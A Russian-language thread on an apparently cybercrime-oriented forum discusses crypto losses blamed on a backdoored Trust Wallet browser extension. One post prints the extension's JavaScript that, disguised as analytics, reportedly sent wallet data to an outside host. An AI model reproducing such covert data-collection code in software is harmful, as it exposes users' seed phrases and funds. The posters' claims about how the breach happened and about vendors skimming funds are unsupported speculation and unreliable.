• XSS.stack #1 – первый литературный журнал от юзеров форума

Удаляйте расширение Trust Wallet из браузера!

Отслеживать

vernicel

RAID-массив
Пользователь
Регистрация
16.12.2025
Сообщения
64
Реакции
24

Trust Wallet взломали?
Пользователи массово столкнулись с потерями криптовалюты на своих кошельках,
https://twitter.com/x/status/2004194034399826004
- пост с твиттера.
Демонстрация проблемы -
. На экспе открыты арбитражи. Что скажете, господа?
 
Последнее редактирование:
Какой Octo, это траст валлет расширение уебали!

У кого кэш на твт, с телефона именно прилы пока не поздно, переводите в другое место.
 
Theriella сказал(а):
Какой Octo, это траст валлет расширение уебали!

У кого кэш на твт, с телефона именно прилы пока не поздно, переводите в другое место.
Как раз, на телефоне все нормально. Проблема на стороне Trust Wallet, она воспроизводится во всех Chromium-based браузерах.
Код: 
Domain:
metrics-trustwallet.com
А также передаётся зашифрованная информация на этот хост при загрузке страницы.

Вот код который делает этот запрос:

JavaScript: 
bootstrap(S) {
          return c(this, null, function* () {
            this.started ||
              (C.Ay.init("phc_b7MQeJq5OhCBJDKHWLA2c1ubYhbY5L97ZsZ66RGwq6O", {
                api_host: "https://api.metrics-trustwallet.com",
                persistence: "localStorage",
                debug: !0,
                autocapture: !1,
                capture_pageview: !1,
                capture_pageleave: !1,
                person_profiles: "always",
                loaded: () => {
                  this.started = !0;
                  const B = (0, i.W9)();
                  C.Ay.register({ version: B, distribution: "" }),
                    C.Ay.setPersonProperties({ version: B }),
                    C.Ay.has_opted_out_capturing() && C.Ay.opt_in_capturing(),
                    this.flushEvents(),
                    n.M_.subscribe(
                      (0, a.debounce)(this.onStoreChanged.bind(this), I)
                    ),
                    S?.();
                },
              }),
              C.Ay.onFeatureFlags(() => {
                const B = C.Ay.featureFlags
                  .getFlags()
                  .reduce(
                    (W, z) =>
                      f(v({}, W), { [z]: C.Ay.featureFlags.getFeatureFlag(z) }),
                    {}
                  );
                n.M_.dispatch(o.A.actions.setFeatureFlags(B));
              }));
          });
        }

1766694605527.png
 
https://x.com/0xakinator
@0xakinator

So here’s what’s happening :In the Trust Wallet browser extension code 4482.js a recent update added hidden code that silently sends wallet data outside It pretends to be analytics, but it tracks wallet activity and triggers when a seed phrase is imported The data was sent to metrics-trustwallet[.]com a domain registered days ago and now down

То есть уязвимым становится импорт сид-фразы?, если верить ресерчеру
 
giantim сказал(а):
а при чем тут окто? это версия траста была корявая уже фиксанули, на мобилках всё ок не разводите панику
как только появилась информация об этом, то были подозрения на окто браузер (тому подтверждение блек на экспе), потом чуть выяснилось все и сразу нашлась корректная причина. я написал в репорт чтобы изменили название треда)
 
Траст в целом не безопасен, есть там моменты одни уже более года, а тут ещё спалили контору ребят на расшире, украв акк одного из девов и сделав в обнове новой бекдорчик, а акк давно был очень уже спзжен, просто готовилась атака.
И то это только начало ;)

Использовать и хранить крипту лучше всего в бтк коре и кошах с подписью везде, даже бтц с сигнатурой подписи, это прекрасное решение.
Все коши, даже "безопасный леджер" сделаны для заработка на них же в разных темах, многие коши сами пиздят крипту у клиентов по 1-2% в месяц, даже меньше, и не палятся так.

Верить конторе которая публикует инфу вообще нельзя, они все пиздаболы. (речь про ньюс каналы официальные).

Хотите кэш сбречь свой лучше используйте как минимум SafePall, Солана валлет с овнером на солану, бтц с подписью, дробить крипту на разных устройствах, и тд
Исп один кош для крипты, и траст - это обречение на неудачу.


К сожалению на хсс очень много специалистов культовых , кого я знал ушли, после принималова админа, вот они бы смогли дать исчепывающий очень ответ на всю эту тему, но уже ребята в привате)
 
Theriella сказал(а):
К сожалению на хсс очень много специалистов культовых , кого я знал ушли, после принималова админа, вот они бы смогли дать исчепывающий очень ответ на всю эту тему, но уже ребята в привате)
ну на экспе что-то выплывает только в арбитражах или при поиске стаффа
Да и здесь культовые не очень-то трепались, давай по-честному.

Что касается подворовывания от овнеров...На экспе есть большая ветка как кто-то жаловался на слив крупного баланса на Exodus c изолированного мака.
Так вот я читая ветку экзодуса ..или на гитхабе или на reddit с огромным удивлением увидела как кто-то из команды извинялся за косяк их софта примерно так:
- о! у нас есть такой крутой дев, парень своебразный, мы часто не понимаем что за код он пишет.

Как бы шутка... И мне "торкнуло" на базе того треда. А что мешает залить бэкдор этому странному парню по чьей вине был подзавален, пусть частично какой-то функционал?
Кто вообще аудирует каждую строку каждого обновления? получается никто, судя по смешливому посту?
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх